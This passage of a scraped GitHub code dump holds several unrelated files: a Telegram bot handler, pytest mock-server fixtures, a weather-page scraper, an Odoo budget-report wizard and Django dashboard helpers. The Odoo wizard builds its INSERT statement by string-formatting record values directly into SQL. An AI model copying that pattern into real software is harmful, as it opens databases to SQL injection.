1\n else:\n PS1_hosts.to_csv(fn, mode='a+', header=False)\n\n with open(\"./dictionaries/\" + dict_fn, 'wb') as fp:\n pickle.dump(SN_Host_PS1, fp, protocol=pickle.HIGHEST_PROTOCOL)\n","repo_name":"CheerfulUser/calibration","sub_path":"kepler/PS1QueryFunctions.py","file_name":"PS1QueryFunctions.py","file_ext":"py","file_size_in_byte":16908,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"8657188563","text":"from aiogram import types, Dispatcher\nfrom aiogram.dispatcher import FSMContext\nfrom aiogram.dispatcher.filters import Command\n\nfrom keyboards.reply.main_menu import main_menu\n\n\nasync def start(message: types.Message, state: FSMContext):\n is_state = await state.get_state()\n if is_state:\n await state.finish()\n\n text = [\n \"Спасибо, что выбрали нас!\",\n \"Выберите в меню, что хотите сделать.\"\n ]\n\n await message.answer('\\n'.join(text), reply_markup=main_menu)\n\n\nasync def back_main(message: types.Message, state: FSMContext):\n await state.finish()\n await message.answer('Главное меню', reply_markup=main_menu)\n\n\ndef register_start(dp: Dispatcher):\n dp.register_message_handler(start, Command(['start']), state='*')\n dp.register_message_handler(back_main, state='*', text='⏪Назад')\n","repo_name":"vnj64/VkCommentsBot","sub_path":"bot_handlers/start.py","file_name":"start.py","file_ext":"py","file_size_in_byte":894,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"164075679","text":"import asyncio\nimport re\nfrom collections import defaultdict\nfrom functools import partial\nfrom typing import Optional\n\nimport pytest\nimport ujson\nfrom aiohttp import ClientSession, TCPConnector, web\n\nfrom aresponses import ResponsesMockServer as BaseResponsesMockServer\nfrom aresponses.utils import ANY\nfrom mail.beagle.beagle.interactions import InteractionClients\nfrom mail.beagle.beagle.tests.utils import get_url_part\n\n\n@pytest.fixture\nasync def clients(test_logger, request_id):\n clients = InteractionClients(test_logger, request_id)\n async with clients:\n 
yield clients\n\n\nclass ResponsesMockServer(BaseResponsesMockServer):\n async def passthrough(self, request):\n connector = TCPConnector()\n connector._resolve_host = partial(self._old_resolver_mock, connector)\n\n original_request = request.clone(scheme=\"https\" if request.headers[\"AResponsesIsSSL\"] else \"http\")\n headers = {k: v for k, v in request.headers.items() if k != \"AResponsesIsSSL\"}\n\n async with ClientSession(connector=connector) as session:\n request_method = getattr(session, request.method.lower())\n async with request_method(original_request.url, headers=headers, data=(await request.read())) as r:\n headers = {k: v for k, v in r.headers.items() if k.lower() == \"content-type\"}\n text = await r.text()\n response = self.Response(text=text, status=r.status, headers=headers)\n return response\n\n\n@pytest.fixture\nasync def mock_server(event_loop):\n async with ResponsesMockServer(loop=event_loop) as server:\n yield server\n\n\n@pytest.fixture\ndef mock_response_json():\n def _inner(body: dict):\n return web.Response(body=ujson.dumps(body), headers={'Content-Type': 'application/json'})\n\n return _inner\n\n\n@pytest.fixture(autouse=True)\nasync def mock_self(mock_server):\n async def handler(request: Optional[web.BaseRequest] = None):\n mock_server.add(re.compile('127.0.0.1:[0-9]+'), ANY, ANY, handler)\n if request is not None:\n return await mock_server.passthrough(request)\n\n await handler()\n\n\n@pytest.fixture(autouse=True)\ndef mock_tvm(mock_server, mock_response_json, rands, randn):\n def handler_tvm_tickets(request: Optional[web.BaseRequest] = None):\n mock_server.add(ANY, '/tvm/tickets', ANY, handler_tvm_tickets)\n if request is not None:\n return mock_response_json({rands(): {\"ticket\": f\"3:serv:{rands()}\", \"tvm_id\": request.query[\"dsts\"]}})\n\n def handler_tvm_checksrv(request: Optional[web.BaseRequest] = None):\n mock_server.add(ANY, '/tvm/checksrv', ANY, handler_tvm_checksrv)\n if request is not None:\n return mock_response_json({\n \"src\": randn(),\n \"dst\": request.query[\"dst\"],\n \"scopes\": None,\n \"debug_string\": rands(),\n \"logging_string\": rands(),\n \"issuer_uid\": None\n })\n\n handler_tvm_checksrv()\n handler_tvm_tickets()\n\n\n@pytest.fixture\ndef client_requests():\n return defaultdict(list)\n\n\n@pytest.fixture\ndef last_client_request(client_requests): # TODO: remove lambda\n return lambda host: client_requests[host][-1]\n\n\n@pytest.fixture\ndef mock_client(mock_server, mock_response_json, client_requests):\n def _inner(host: str, *args, **kwargs):\n if len(args) == 1:\n responses = args[0]\n elif len(args) == 2:\n responses = {args[0]: args[1]}\n elif 'responses' in kwargs:\n responses = kwargs['responses']\n else:\n raise Exception('Invalid mock_client params')\n\n for path_pattern, response in responses.items():\n if isinstance(response, (dict, list)):\n response = mock_response_json(response)\n\n def handler(resp):\n async def _inner(request):\n await request.read()\n client_requests[host].append(request)\n\n if callable(resp):\n if asyncio.iscoroutinefunction(resp):\n return await resp(request)\n else:\n return resp(request)\n else:\n return resp\n\n return _inner\n\n mock_server.add(host, path_pattern=path_pattern, response=handler(response))\n\n return _inner\n\n\n# Passport\n@pytest.fixture\ndef mock_passport(beagle_settings, mock_client):\n host = get_url_part(beagle_settings.PASSPORT_API_URL, 'netloc')\n return lambda *args, **kwargs: mock_client(host, *args, **kwargs)\n\n\n@pytest.fixture\ndef 
last_passport_request(beagle_settings, last_client_request):\n return lambda: last_client_request(get_url_part(beagle_settings.PASSPORT_API_URL, 'netloc'))\n\n\n# Directory\n@pytest.fixture\ndef directory_host(beagle_settings):\n return get_url_part(beagle_settings.DIRECTORY_API_URL, 'netloc')\n\n\n@pytest.fixture\ndef mock_directory(directory_host, mock_client):\n return lambda *args, **kwargs: mock_client(directory_host, *args, **kwargs)\n\n\n@pytest.fixture\ndef directory_requests(directory_host, client_requests):\n return client_requests[directory_host]\n\n\n@pytest.fixture\ndef last_directory_request(directory_host, last_client_request):\n return lambda: last_client_request(directory_host)\n\n\n# Blackbox\n@pytest.fixture\ndef mock_blackbox(beagle_settings, mock_client):\n host = get_url_part(beagle_settings.BLACKBOX_API_URL, 'netloc')\n path = get_url_part(beagle_settings.BLACKBOX_API_URL, 'path')\n return lambda response: mock_client(host, path, response)\n\n\n@pytest.fixture\ndef last_blackbox_request(beagle_settings, last_client_request):\n return lambda: last_client_request(get_url_part(beagle_settings.BLACKBOX_API_URL, 'netloc'))\n\n\n@pytest.fixture\ndef blackbox_requests(beagle_settings, client_requests):\n return lambda: client_requests[get_url_part(beagle_settings.BLACKBOX_API_URL, 'netloc')]\n\n\n# Sender\n@pytest.fixture\ndef mock_sender(beagle_settings, mock_client):\n host = get_url_part(beagle_settings.SENDER_API_URL, 'netloc')\n return lambda *args, **kwargs: mock_client(host, *args, **kwargs)\n\n\n@pytest.fixture\ndef last_sender_request(beagle_settings, last_client_request):\n return lambda: last_client_request(get_url_part(beagle_settings.SENDER_API_URL, 'netloc'))\n\n\n# MBody\n@pytest.fixture\ndef mock_mbody(beagle_settings, mock_client):\n host = get_url_part(beagle_settings.MBODY_API_URL, 'netloc')\n return lambda *args, **kwargs: mock_client(host, *args, **kwargs)\n\n\n@pytest.fixture\ndef last_mbody_request(beagle_settings, last_client_request):\n return lambda: last_client_request(get_url_part(beagle_settings.MBODY_API_URL, 'netloc'))\n\n\n# Hound\n@pytest.fixture\ndef mock_hound(beagle_settings, mock_client):\n host = get_url_part(beagle_settings.HOUND_API_URL, 'netloc')\n return lambda *args, **kwargs: mock_client(host, *args, **kwargs)\n\n\n@pytest.fixture\ndef last_hound_request(beagle_settings, last_client_request):\n return lambda: last_client_request(get_url_part(beagle_settings.HOUND_API_URL, 'netloc'))\n","repo_name":"Alexander-Berg/2022-test-examples-3","sub_path":"mail/tests/interactions.py","file_name":"interactions.py","file_ext":"py","file_size_in_byte":7132,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"44478861294","text":"import argparse\nimport requests\nimport pandas as pd\nimport ast\nfrom datetime import datetime, timedelta\nfrom bs4 import BeautifulSoup\n\ndef get_data_of_future(future_dates,future_day_temperatures,future_night_temperatures):\n '''\n\n :param future_date: empty list after initialization\n :param future_day_temperature: empty list after initialization\n :param future_night_temperature: empty list after initialization\n :return: future_date: predicted day\n future_day_temperature: day temperature recorded by the website\n future_night_temperature: night temperature recorded by the website\n '''\n for day in range(1, 90):\n file_name = (datetime.now() + timedelta(days=day)).strftime(\"%Y-%m-%d\")\n with open(file_name +'.htm', 'r')as wb_data:\n soup = 
BeautifulSoup(wb_data, 'lxml')\n future_dates.append(file_name)\n future_day_temperatures.append(soup.find_all('p','value')[0].contents[0][5:8])\n future_night_temperatures.append(soup.find_all('p','value')[1].contents[0][5:8])\n return future_dates,future_day_temperatures,future_night_temperatures\n\n\ndef get_past_data(past_dates,past_high_temperatures,past_low_temperatures):\n '''\n\n :param past_dates: empty list after initialization\n :param past_high_temperatures: empty list after initialization\n :param past_low_temperatures: empty list after initialization\n :return:\n '''\n for month in range(1,13):\n if month < 10:\n file_name = '2012-0' + str(month)\n else:\n file_name = '2012-' + str(month)\n with open(file_name +'.htm', 'r')as wb_data:\n soup_past = BeautifulSoup(wb_data, 'lxml')\n history = soup_past.find_all(id='history')[0]\n if month == 1 or month == 3 or month == 5 or month == 7 or month == 8 or month == 10 or month == 12:\n for i in range(0, 186, 6):\n past_dates.append(history.find_all('td')[i].contents[0])\n past_high_temperatures.append(history.find_all('td')[i + 1].contents[0] + '°')\n past_low_temperatures.append(history.find_all('td')[i + 2].contents[0] + '°')\n elif month == 4 or month == 6 or month == 9 or month == 11:\n for i in range(0, 180, 6):\n past_dates.append(history.find_all('td')[i].contents[0])\n past_high_temperatures.append(history.find_all('td')[i + 1].contents[0] + '°')\n past_low_temperatures.append(history.find_all('td')[i + 2].contents[0] + '°')\n else:\n for i in range(0, 168, 6):\n past_dates.append(history.find_all('td')[i].contents[0])\n past_high_temperatures.append(history.find_all('td')[i + 1].contents[0] + '°')\n past_low_temperatures.append(history.find_all('td')[i + 2].contents[0] + '°')\n\n return past_dates,past_high_temperatures,past_low_temperatures\n\n\n\n\ndef grab_data_from_downloaded_raw_files():\n # get data from the first url: future temperature\n future_dates = list()\n future_day_temperatures = list()\n future_night_temperatures = list()\n future_dates, future_day_temperatures, future_night_temperatures = get_data_of_future(future_dates, future_day_temperatures, future_night_temperatures)\n # store data as csv\n data = {'Day Temperature': future_day_temperatures, 'Night Temperature': future_night_temperatures}\n dataframe_future = pd.DataFrame(data, index=future_dates)\n dataframe_future.to_csv(\"future_temperature_from_url.csv\", index=True, sep=',')\n\n # get data from the first url: past temperature\n past_dates = list()\n past_high_temperatures = list()\n past_low_temperatures = list()\n past_dates, past_high_temperatures, past_low_temperatures = get_past_data(past_dates, past_high_temperatures,past_low_temperatures)\n # store data as csv\n months = {'jan': '01', 'feb': '02', 'mar': '03', 'apr': '04', 'may': '05', 'jun': '06', 'jul': '07', 'aug': '08',\n 'sep': '09', 'oct': '10', 'nov': '11', 'dec': '12'}\n past_dates_format = list()\n for i in range(0, 365):\n if 0 < int(past_dates[i].split()[0]) < 10:\n past_dates_format.append(\n past_dates[i].split()[2] + '-' + months[past_dates[i].split()[1]] + '-0' + past_dates[i].split()[0])\n else:\n past_dates_format.append(\n past_dates[i].split()[2] + '-' + months[past_dates[i].split()[1]] + '-' + past_dates[i].split()[0])\n past_data = {'Past High Temperature': past_high_temperatures, 'Past Low Temperature': past_low_temperatures}\n dataframe_past = pd.DataFrame(past_data, index=past_dates_format)\n dataframe_past.to_csv(\"past_temperature_from_url.csv\", index=True, 
sep=',')\n\n","repo_name":"qjasmine014/INF510","sub_path":":src/local.py","file_name":"local.py","file_ext":"py","file_size_in_byte":4813,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"73962724392","text":"# -*- coding: utf-8 -*-\r\n\r\nfrom odoo import api, fields, models, _\r\nfrom odoo.tools import float_is_zero, float_compare\r\nfrom odoo.tools.misc import formatLang\r\n\r\nfrom odoo.exceptions import UserError, RedirectWarning, ValidationError\r\n\r\nimport odoo.addons.decimal_precision as dp\r\nimport json\r\nimport logging\r\nfrom openerp.http import request\r\nimport time\r\nimport base64\r\n\r\n_logger = logging.getLogger(__name__)\r\n\r\ntry:\r\n    import xlsxwriter\r\nexcept ImportError:\r\n    _logger.debug('Can not import xlsxwriter.')\r\n\r\n\r\nclass presupuesto_ejecucion_gastos_contables(models.TransientModel):\r\n\t_name = \"presupuesto.ejecucion.gastos.contables\"\r\n\t_description = \"Ejecucion de Gastos Contables\"\r\n\r\n\tchart_rubros_id = fields.Many2one('presupuesto.rubros', 'Plan de Rubros', required=True, domain = [('parent_id','=', False)], default = lambda self: self._get_rubros(), ondelete = 'cascade')\r\n\tfiscalyear_id = fields.Many2one('account.fiscalyear', u'Año fiscal', select=True, required=True, default = lambda self: self._get_fiscalyear())\r\n\tcompany_id = fields.Many2one('res.company', 'Company', related = 'chart_rubros_id.company_id')\r\n\tperiod_from = fields.Many2one('account.period', 'Periodo inicial', required=True)\r\n\tperiod_to = fields.Many2one('account.period', 'Periodo final', required=True)\r\n\tperiod_ant = fields.Many2one('account.period', 'Periodo anterior')\r\n\r\n\tdata_ids = fields.One2many('presupuesto.ejecucion.gastos.contables.report', 'active_id', 'Records')\r\n\texcel_file_name = fields.Char('Nombre archivo excel')\r\n\texcel_file = fields.Binary('Archivo excel generado:', readonly='True')\r\n\r\n\t\r\n\tdef _get_rubros(self):\r\n\t\trubros = self.env['presupuesto.rubros'].search([('parent_id', '=', False), ('company_id', '=', self.env.user.company_id.id)], limit=1)\r\n\t\treturn rubros and rubros[0] or False\r\n\r\n\t\r\n\tdef _get_fiscalyear(self):\r\n\t\tcontext = self.env.context\r\n\r\n\t\tnow = time.strftime('%Y-%m-%d')\r\n\t\tcompany_id = False\r\n\t\tids = context.get('active_ids', [])\r\n\t\tif ids and context.get('active_model') == 'presupuesto.rubros':\r\n\r\n\t\t\tcompany_id = self.env['presupuesto.rubros'].browse(ids[0]).company_id.id\r\n\t\telse: # use current company id\r\n\t\t\tcompany_id = self.env.user.company_id.id\r\n\r\n\t\tdomain = [('company_id', '=', company_id), ('date_start', '<', now), ('date_stop', '>', now)]\r\n\t\tfiscalyears = self.env['account.fiscalyear'].search(domain)\r\n\t\treturn fiscalyears and fiscalyears[0] or False\r\n\r\n\t@api.onchange('period_to')\r\n\tdef onchange_period(self):\r\n\r\n\r\n\t\tif self.period_to:\r\n\r\n\t\t\tperiod = self.period_to\r\n\t\t\tyear = period.fiscalyear_id.id\r\n\t\t\tperiod_0 = period.id - 1\r\n\t\t\tperiod_0 = self.env['account.period'].browse(period_0)\r\n\t\t\tyear_0 = period_0.fiscalyear_id.id\r\n\t\t\tspecial_0 = period_0.special\r\n\t\t\tif year == year_0 and special_0 == False:\r\n\t\t\t\tperiod_0 = period_0.id\r\n\t\t\telse:\r\n\t\t\t\tperiod_0 = None\r\n\r\n\t\t\tself.period_ant = period_0\r\n\r\n\r\n\t@api.multi\r\n\tdef create_ejecucion_gastos_contables_excel(self):\r\n\r\n\t\tdatos = self.env['presupuesto.util'].sql({'rubro_tipo' : 'G'}, 
{\r\n\t\t\t'active_model' : 'presupuesto.ejecucion.gastos.contables',\r\n\t\t\t'active_id' : self.id\r\n\t\t})\r\n\t\tif datos:\r\n\t\t\tdatos = datos[ 0 ]\r\n\r\n\t\t\tself.env.cr.execute('delete from presupuesto_ejecucion_gastos_contables_report where active_id = %s' % ( self.id ))\r\n\r\n\t\t\tsql = 'insert into presupuesto_ejecucion_gastos_contables_report(active_id, rubro_codigo, rubro_nombre, rubro_nivel, rubro_codigo_cta_contable, rubro_nombre_cta_contable, obligacion_cta_mes_actual, obligacion_cta_acumulado, adiciones, reducciones, creditos, contracreditos, apropiacion_definitiva, ejecutado_anterior, ejecutado_mes, total_ejecutado, saldo_por_ejecutar, porcentaje, cdp_mes_anterior, cdp_mes_actual, cdp_acumulado, apropiacion_disponible, registro_mes_anterior, registro_mes_actual, registro_acumulado, comprometer, obligacion_mes_anterior, obligacion_mes_actual, obligacion_acumulado, por_obligar, pago_mes_anterior, pago_mes_actual, pago_acumulado, por_pagar) values'\r\n\t\t\tvalues = []\r\n\t\t\tfor dato in datos:\r\n\t\t\t\tdato.update({\r\n\t\t\t\t\t'active_id' : self.id\r\n\t\t\t\t})\r\n\t\t\t\tvalues.append(\"(%(active_id)s, '%(rubro_codigo)s', '%(rubro_nombre)s', '%(rubro_nivel)s', '%(rubro_codigo_cta_contable)s', '%(rubro_nombre_cta_contable)s', '%(obligacion_cta_mes_actual)s', '%(obligacion_cta_acumulado)s', '%(adiciones)s', '%(reducciones)s', '%(creditos)s', '%(contracreditos)s', '%(apropiacion_definitiva)s', '%(ejecutado_anterior)s', '%(ejecutado_mes)s', '%(total_ejecutado)s', '%(saldo_por_ejecutar)s', '%(porcentaje)s', '%(cdp_mes_anterior)s', '%(cdp_mes_actual)s', '%(cdp_acumulado)s', '%(apropiacion_disponible)s', '%(registro_mes_anterior)s', '%(registro_mes_actual)s', '%(registro_acumulado)s', '%(comprometer)s', '%(obligacion_mes_anterior)s', '%(obligacion_mes_actual)s', '%(obligacion_acumulado)s', '%(por_obligar)s', '%(pago_mes_anterior)s', '%(pago_mes_actual)s', '%(pago_acumulado)s', '%(por_pagar)s')\" % dato )\r\n\r\n\t\t\tsql = sql + ','.join( values )\t\r\n\r\n\t\t\t_logger.info( sql )\r\n\r\n\t\t\tself.env.cr.execute( sql )\r\n\r\n\t\tworkbook = xlsxwriter.Workbook('/tmp/presupuesto_ejecucion_gastos_contables.xlsx')\r\n\t\tworksheet = workbook.add_worksheet()\r\n\t\tformat_company = workbook.add_format({'bold': True, 'font_size': 14, 'align': 'left', })\r\n\t\tformat_titulo = workbook.add_format({'bold': True, 'font_size': 14, 'align': 'center'})\r\n\t\tformat_cabecera = workbook.add_format({'bold': True, 'font_size': 12, 'border': True, 'align': 'center', 'valign': 'vcenter', 'bg_color': 'gray'})\r\n\t\tformat_celda_str = workbook.add_format({'font_size': 12, 'border': True})\r\n\t\tformat_celda_num = workbook.add_format({'font_size': 12, 'border': True, 'num_format': '#,##0.00'})\r\n\t\tworksheet.set_row(3,35)\r\n\t\tworksheet.set_column('A:A',10)\r\n\t\tworksheet.set_column('B:B',30)\r\n\t\tworksheet.set_column('C:C',4)\r\n\t\tworksheet.set_column('D:D',10)\r\n\t\tworksheet.set_column('E:E',30)\r\n\t\tworksheet.set_column('F:T',20)\r\n\t\tcompany = self.env.user.partner_id.company_id.name\r\n\t\trec_gastos = self.sudo().env['presupuesto.ejecucion.gastos.contables.report'].search([('active_id', '=', self.id)])\r\n\t\tworksheet.merge_range('A1:D1', company, format_company)\r\n\t\tworksheet.merge_range('A3:M3', u'Ejecución de Gastos Contables', format_titulo)\r\n\t\tworksheet.merge_range('A4:A5', 'Rubro', format_cabecera)\r\n\t\tworksheet.merge_range('B4:B5', 'Nombre', format_cabecera)\r\n\t\tworksheet.merge_range('C4:C5', 'N', 
format_cabecera)\r\n\t\tworksheet.merge_range('D4:D5', 'Cuenta\\ncontable', format_cabecera)\r\n\t\tworksheet.merge_range('E4:E5', 'Nombre', format_cabecera)\r\n\t\tworksheet.merge_range('F4:G4', u'Obligación Rubro', format_cabecera)\r\n\t\tworksheet.merge_range('H4:I4', u'Obligación cuenta contable', format_cabecera)\r\n\t\tworksheet.merge_range('J4:K4', 'Pago', format_cabecera)\r\n\t\tworksheet.merge_range('L4:M4', 'Cta. x pagar', format_cabecera)\r\n\t\trow = 4\r\n\t\tworksheet.write(row, 5, 'MES', format_cabecera)\r\n\t\tworksheet.write(row, 6, 'ACUM', format_cabecera)\r\n\t\tworksheet.write(row, 7, 'MES', format_cabecera)\r\n\t\tworksheet.write(row, 8, 'ACUM', format_cabecera)\r\n\t\tworksheet.write(row, 9, 'MES', format_cabecera)\r\n\t\tworksheet.write(row, 10, 'ACUM', format_cabecera)\r\n\t\tworksheet.write(row, 11, 'MES', format_cabecera)\r\n\t\tworksheet.write(row, 12, 'ACUM', format_cabecera)\r\n\t\trow = 5\r\n\t\tfor gasto in rec_gastos:\r\n\t\t\tworksheet.write(row, 0, gasto.rubro_codigo, format_celda_str)\r\n\t\t\tworksheet.write(row, 1, gasto.rubro_nombre, format_celda_str)\r\n\t\t\tworksheet.write(row, 2, gasto.rubro_nivel, format_celda_str)\r\n\t\t\tworksheet.write(row, 3, gasto.rubro_codigo_cta_contable, format_celda_str)\r\n\t\t\tworksheet.write(row, 4, gasto.rubro_nombre_cta_contable, format_celda_str)\r\n\t\t\tworksheet.write(row, 5, gasto.obligacion_mes_actual, format_celda_num)\r\n\t\t\tworksheet.write(row, 6, gasto.obligacion_acumulado, format_celda_num)\r\n\t\t\tworksheet.write(row, 7, gasto.obligacion_cta_mes_actual, format_celda_num)\r\n\t\t\tworksheet.write(row, 8, gasto.obligacion_cta_acumulado, format_celda_num)\r\n\t\t\tworksheet.write(row, 9, gasto.pago_mes_actual, format_celda_num)\r\n\t\t\tworksheet.write(row, 10, gasto.pago_acumulado, format_celda_num)\r\n\t\t\tworksheet.write(row, 11, gasto.obligacion_mes_actual - gasto.pago_mes_actual, format_celda_num)\r\n\t\t\tworksheet.write(row, 12, gasto.obligacion_acumulado - gasto.pago_acumulado, format_celda_num)\r\n\t\t\trow += 1\r\n\t\t\tcol = 0\r\n\t\tworkbook.close()\r\n\t\tarchivo_excel = open('/tmp/presupuesto_ejecucion_gastos_contables.xlsx','rb')\r\n\t\tsalida = archivo_excel.read()\r\n\t\tarchivo_excel.close()\r\n\r\n\t\tself.excel_file_name = 'presupuesto_ejecucion_gastos_contables.xlsx'\r\n\t\tself.excel_file = base64.b64encode(salida)\r\n\r\n\t\treturn {'type' : 'ir.actions.act_window', 'res_model' : self._name, 'res_id' : self.id, 'view_type' : 'form', 'view_mode' : 'form', 'target' : 'new'} \r\n\r\npresupuesto_ejecucion_gastos_contables()\r\n ","repo_name":"hivam/l10n_co_budget","sub_path":"wizard/presupuesto_ejecucion_gastos_contables_wz.py","file_name":"presupuesto_ejecucion_gastos_contables_wz.py","file_ext":"py","file_size_in_byte":8742,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"74079755432","text":"\nimport datetime\nimport datetime as dt\nimport calendar\nfrom api.models import *\nfrom api.basics import *\nfrom collections import OrderedDict\nLOCAL_ZONE = \"Asia/Kolkata\"\nfrom common.utils import getHttpResponse as json_HttpResponse\n\ndef data_dict(variable):\n \"\"\"It generates common code required for all the widgets\"\"\"\n \n main_data_dict = {}\n from_date = datetime.datetime.strptime(variable['from'],'%Y-%m-%d').date()\n to_date = datetime.datetime.strptime(variable['to'],'%Y-%m-%d').date()\n project_name = variable.get('project','')\n if project_name:\n project_name = project_name.split(' -')[0]\n center_name = 
variable.get('center','')\n if center_name:\n center_name = center_name.split(' -')[0]\n pro_cen_mapping = []\n pro_cen_mapping.append(Project.objects.filter(name=project_name).values_list('id', 'name')[0])\n pro_cen_mapping.append(Center.objects.filter(name=center_name).values_list('id', 'name')[0])\n main_data_dict['pro_cen_mapping'] = pro_cen_mapping\n main_data_dict['work_packet'] = variable.get('work_packet',[])\n main_data_dict['sub_project'] = variable.get('sub_project','')\n main_data_dict['sub_packet'] = variable.get('sub_packet','')\n dwm_dict= {}\n date_list=num_of_days(to_date,from_date)\n type = variable.get('type','')\n if type == '':\n type = 'day'\n is_clicked = variable.get('is_clicked','NA')\n if type == 'day':\n if 'yes' not in is_clicked:\n date_count = len(date_list)\n if date_count > 15:\n type = 'week'\n if date_count > 60:\n type = 'month'\n if date_count == 1:\n type = 'hour'\n dwm_dict['day']= date_list\n main_data_dict['dwm_dict'] = dwm_dict\n \n if type == 'hour':\n hours_data = []\n data = [(i, dt.time(i).strftime('%I %p')) for i in range(24)]\n for i in data:\n hours_data.append(i[0])\n dwm_dict['hour'] = hours_data\n main_data_dict['dates'] = date_list\n main_data_dict['dwm_dict'] = dwm_dict\n\n if type == 'week':\n months_dict = {}\n weeks_data = [] \n days = (to_date - from_date).days\n days = days+1\n for i in xrange(days):\n date = from_date + datetime.timedelta(i)\n weeks_data.append(str(date))\n weeks = [] \n weekdays = [] \n fro_mon = datetime.datetime.strptime(weeks_data[0],'%Y-%m-%d').date()\n to_mon = datetime.datetime.strptime(weeks_data[-1],'%Y-%m-%d').date()\n no_of_days = to_mon - fro_mon\n num_days = int(re.findall('\\d+', str(no_of_days))[0]) + 1\n week_list=[]\n start = 1\n end = 7 - fro_mon.weekday()\n while start <= num_days:\n weeks.append({'start': start, 'end': end})\n sdate = fro_mon + datetime.timedelta(start - 1)\n edate = fro_mon + datetime.timedelta(end - 1)\n weekdays.append({'start': sdate, 'end': edate})\n start = end + 1\n end = end + 7\n if end > num_days:\n end = num_days\n if weekdays[-1]['end'] > to_mon :\n weekdays[-1]['end'] = to_mon\n for w_days in weekdays:\n date_list = num_of_days(w_days['end'],w_days['start'])\n week_list.append(date_list)\n\n if type == 'week':\n employe_dates = {}\n dwm_dict['week'] = week_list\n for week in week_list:\n if week and employe_dates.has_key('days'):\n employe_dates['days'] = employe_dates['days']+week\n\n else:\n employe_dates['days'] = week\n \n main_data_dict['dwm_dict'] = dwm_dict\n\n if type == 'month':\n months_dict = {}\n month_list = [[]]\n month_names_list = []\n month_count = 0\n days = (to_date - from_date).days\n days = days+1\n\n for i in xrange(0, days):\n date = from_date + datetime.timedelta(i)\n month = date.strftime(\"%B\")\n month = month+'_'+str(date).split('-')[0]\n if month not in month_names_list:\n month_names_list.append(month)\n if month in months_dict:\n months_dict[month].append(str(date))\n month_list[month_count].append(str(date))\n else:\n months_dict[month] = [str(date)]\n month_count = month_count + 1\n month_list.append([str(date)])\n if month_list[0] == []:\n del month_list[0]\n \n if type == 'month':\n dwm_dict['month'] = {'month_names':month_names_list, 'month_dates':month_list}\n main_data_dict['dwm_dict'] = dwm_dict\n main_data_dict['type'] = type\n return main_data_dict \n\n\ndef get_packet_details(request):\n \"\"\"It will generate all the list of packets, projects and sub packets for the project\"\"\"\n\n main_data_dict = 
data_dict(request.GET)\n if main_data_dict['type'] == 'hour':\n dates = main_data_dict['dwm_dict']['day']\n else:\n dates = [main_data_dict['dwm_dict']['day'][:-1][0], main_data_dict['dwm_dict']['day'][-1:][0]]\n final_dict = {}\n if main_data_dict['type'] == 'hour':\n raw_master_set = RawTable.objects.filter(\\\n project=main_data_dict['pro_cen_mapping'][0][0], center=main_data_dict['pro_cen_mapping'][1][0], date=dates[0])\n else:\n raw_master_set = RawTable.objects.filter(\\\n project=main_data_dict['pro_cen_mapping'][0][0], center=main_data_dict['pro_cen_mapping'][1][0], \\\n date__range=dates)\n \n sub_pro_level = filter(None, raw_master_set.values_list('sub_project',flat=True).distinct())\n sub_project_level = [i for i in sub_pro_level]\n if sub_project_level:\n sub_project_level.append('all')\n else:\n sub_project_level = ''\n work_pac_level = filter(None, raw_master_set.values_list('work_packet',flat=True).distinct())\n work_packet_level = [j for j in work_pac_level]\n if work_packet_level:\n work_packet_level.append('all')\n else:\n work_packet_level = ''\n sub_pac_level = filter(None, raw_master_set.values_list('sub_packet',flat=True).distinct())\n sub_packet_level = [k for k in sub_pac_level]\n if sub_packet_level:\n sub_packet_level.append('all')\n else:\n sub_packet_level = ''\n prj_type = request.GET.get('voice_project_type', '')\n if main_data_dict['type'] == 'hour':\n inbound_hourly_master_set = InboundDaily.objects.filter(\\\n project=main_data_dict['pro_cen_mapping'][0][0], center=main_data_dict['pro_cen_mapping'][1][0],\\\n date = dates[0])\n outbound_hourly_master_set = OutboundDaily.objects.filter(\\\n project=main_data_dict['pro_cen_mapping'][0][0], center=main_data_dict['pro_cen_mapping'][1][0],\\\n date = dates[0])\n else:\n inbound_hourly_master_set = InboundDaily.objects.filter(\\\n project=main_data_dict['pro_cen_mapping'][0][0], center=main_data_dict['pro_cen_mapping'][1][0],\\\n date__range = dates)\n outbound_hourly_master_set = OutboundDaily.objects.filter(\\\n project=main_data_dict['pro_cen_mapping'][0][0], center=main_data_dict['pro_cen_mapping'][1][0],\\\n date__range = dates)\n if prj_type == 'inbound' or prj_type == '':\n location_names = filter(None, inbound_hourly_master_set.values_list('location',flat=True).distinct())\n elif prj_type == 'outbound':\n location_names = ''\n else:\n location_names = ''\n location_list, skill_list, dispo_list = [], [], []\n for location in location_names:\n location_list.append(location)\n if prj_type == 'inbound' or prj_type == '':\n skill_names = filter(None, inbound_hourly_master_set.values_list('skill',flat=True).distinct())\n elif prj_type == 'outbound':\n skill_names = ''\n else:\n skill_names = ''\n for skill in skill_names:\n skill_list.append(skill)\n if prj_type == 'inbound' or prj_type == '':\n disposition_names = filter(None, inbound_hourly_master_set.values_list('disposition',flat=True).distinct())\n elif prj_type == 'outbound':\n disposition_names = filter(None, outbound_hourly_master_set.values_list('disposition',flat=True).distinct())\n else:\n disposition_names = ''\n is_voice = Project.objects.filter(\\\n id=main_data_dict['pro_cen_mapping'][0][0], center=main_data_dict['pro_cen_mapping'][1][0])\\\n .values_list('is_voice', flat=True).distinct()\n if is_voice:\n is_voice = is_voice[0]\n else:\n is_voice = ''\n for dispo in disposition_names:\n dispo_list.append(dispo)\n if location_list:\n location_list.append('All')\n location_list.sort()\n else:\n location_list = ''\n if skill_list:\n 
